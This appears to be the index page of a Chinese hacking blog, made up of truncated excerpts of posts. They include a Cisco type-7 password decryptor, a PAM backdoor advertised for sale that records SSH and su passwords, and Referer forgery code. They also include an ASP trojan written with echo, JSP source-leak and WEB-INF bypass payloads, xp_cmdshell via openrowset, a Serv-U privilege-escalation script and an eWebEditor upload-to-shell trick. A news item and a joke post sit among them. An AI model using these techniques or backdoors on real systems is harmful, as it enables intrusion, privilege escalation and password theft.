既然已经失去了进入天堂寻觅幸福的资格..那么就让我沉沦地狱吧!

    摘要：

/*
* * descambles cisco IOS type-7 passwords
* * found somewhere on the internet, slightly modified, anonymous@segfault.net
* *
* * gcc -Wall -o ciscocrack ciscocrack.c
* * ./ciscocrack 01178E05590909022A
* *
* */

#include <stdio.h>
#include <ctype.h>

char xlat[] = {
        0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
  &nbs    （全文共4700字）——点击此处阅读全文

    摘要：   期待最近bct重新开张    （全文共24字）——点击此处阅读全文

    摘要：

  牛人无数，sql无处不在啊！

北京时间7月22日消息，据国外媒体报道，俄罗斯信息安全厂商卡巴斯基实验室的马拉西亚网站周六被黑客攻破，相关的一个网络购物站点也受到影响。

　　网络安全组织Zone-H记录了这次攻击。
　　
　　记录显示，攻击者昵称为“m0sted”，攻击采用了“SQL注入”的方式。卡巴斯基随后关闭了该网站，该网站采用的是微软的IIS网络服务器。随后该网站不再面向所有用户开放，在接入前要求输入用户名和密码。

　　Zone-H同时公布了卡巴斯基该网站被攻破之后的截图。卡巴斯基尚未对这一事件发表评论，不过Zone-H表示，由于此次的攻击仅仅是以破坏为目的，因此未来还有可能出现更严重的安全风险。

　　卡巴斯基在该网站上提供评估版的安全软件下载，因此攻击者有可能以卡巴斯基的名义在该网站上发布恶意软件，这将对用户造成巨大威胁。

    （全文共450字）——点击此处阅读全文

    摘要：

  废话不多说了,直接把动画txt写上,要的联系,货真价实的.联系qq:909473606

1.安装
编译好后，cp过去文件即可
有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去
linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡

我现在要安装后门的机器是fc4 具体内核没啥限制 应用层后门就这点好，呵呵

安装
我已经编译好了

安装完毕，那个so穿上去就行了
这是我们的后门

注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。

OK，安装完毕

现在看看他有什么功能

1.记录密码
这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下

我们开启

touch     （全文共1002字）——点击此处阅读全文

    摘要：1.某次考试考语文，我的同桌在默词的时候突然灵感来了~前句：问君能有几多愁，要求补后句，他补了句：恰似一道红叉卷上留（原句：恰似一江春水向东流）。老师毫不客气得在卷上打了个X。他还沾沾自喜说：“原来我的灵感好灵的！”

2.也是语文考试默词，题目是：玉不琢，不成器。结果我们班一强人答：朋友妻，不客气，第二天家长就被叫到学校了。

3.又是语文考试，题目：长江后浪推前浪； 某人答：一代更比一代浪。结果自然是家长又见校长。

4.高中的时候考试有道题是这样的：请写出鲁迅先生的作品《藤野先生》中藤野先生的全名。其答案如下：藤野菜菜子，藤野英二狼， （当时正好有放棒球英豪这个动画片）藤野武大郎，藤野花道，藤野五十六，藤野内丰，藤野隆史等等等等，比较绝的有：藤野小绵羊，气的老师在广播里骂我们无知。

5.一题曰“清水出芙蓉”，有人居然答到“乱世出英雄”，或答“山村出美女”，或答“深海出蛟龙”&hel    （全文共1190字）——点击此处阅读全文

    摘要：HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。

以下是伪造方法：

ASP/Visual Basic代码
dim http
set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以
Http.open "GET",url,false
Http.setRequestHeader "Referer","http://www.dc9.cn/"
Http.send()

PHP(前提是装了curl):

PHP代码
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "    （全文共2317字）——点击此处阅读全文

    摘要：Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。


文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：

1，用Echo命令写ASP木马。
前提当然是目标主机上已经安装了IIS。
一般的ASP木马"体积"较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
直接给出echo版：

@echo ^ >up.asp

注意，只有一行，中间没有回车符。
生成的up.asp不能用浏览器访问，只    （全文共22729字）——点击此处阅读全文

    摘要：

J2EE的WEB，都有一个WEB-INF的目录，这个目录下有所有的WEB配置文件，数据库配置文件和java二进制文件class文件。有很多站因为配置错误或者是默认配置，导致WEB-INF目录可浏览。通常一些J2EE WEB平台还有些通用的限制绕过漏洞

/WEB-INF../    /WEB-INF..%5C

J2EE的程序访问是通过配置文件里的路径设定实现的，"/xxx.do",并不代表目录下有xxx.do这个文件。

JSP的注射，现在已经有些工具可以实现，手工就没必要介绍了。但jsp有一些通用的源码泄露漏洞（一些流行的JSP WEB平台现在已经没这些漏洞了，低版本的还是有。如果看到是些不常见的JSP服务器，可以试一下）

.jsP .Jsp .jSp .JSP .jsp%2e .jsp%20 .jsp%80 .jsp%81.....jsp%89

关于HTTP访问和SSL访问差异，在有些情况下，WWW和SSL对WEB的访问，采取的是不同的配置。比如WEB    （全文共905字）——点击此处阅读全文

    摘要： 忽然发现1个多月前替代就给我几张此照片，我还笑他是ps的，这傻！    （全文共38字）——点击此处阅读全文

    摘要：1．关于openrowset和opendatasource

　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下：
select * from openrowset('sqloledb','myserver';'sa';'','select * from table')

　　可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。

　　那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！
select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''')
必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的o    （全文共4274字）——点击此处阅读全文

    摘要：Serv-U 6.X 提权脚本
使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在"服务器端口"里填21，然后再在"服务器IP"中填写服务器的真实IP。
复制内容到剪贴板代码:
<%@ LANGUAGE = VBScript %>
<%
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
action=request("action")
if not isnumeric(action) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(reque    （全文共10323字）——点击此处阅读全文

    摘要：打开eWebEditorNet/upload.aspx，选择一个cer文件。
再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。    （全文共117字）——点击此处阅读全文

    摘要：SQL盲注攻击技术综述

1 SQL盲注攻击技术综述 Javaphile
SQL盲注攻击技术综述
coolswallow of Javaphile (coolswallow@shaolin.org.cn)
Blind SQL Injection Techniques: A Survey
Abstract: This paper gives a survey of current Blind SQL Injection Techniques. It first introduces the definition
of SQL Injection and its risk, and reviews several solutions proposed to solve the problem and their each
disadvantages. Then, the paper discusses that if detailed error messages are suppressed, how to     （全文共13096字）——点击此处阅读全文